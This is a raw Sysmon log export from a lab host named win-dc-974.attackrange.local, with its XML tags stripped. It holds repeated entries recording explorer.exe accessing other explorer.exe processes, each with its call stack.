16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 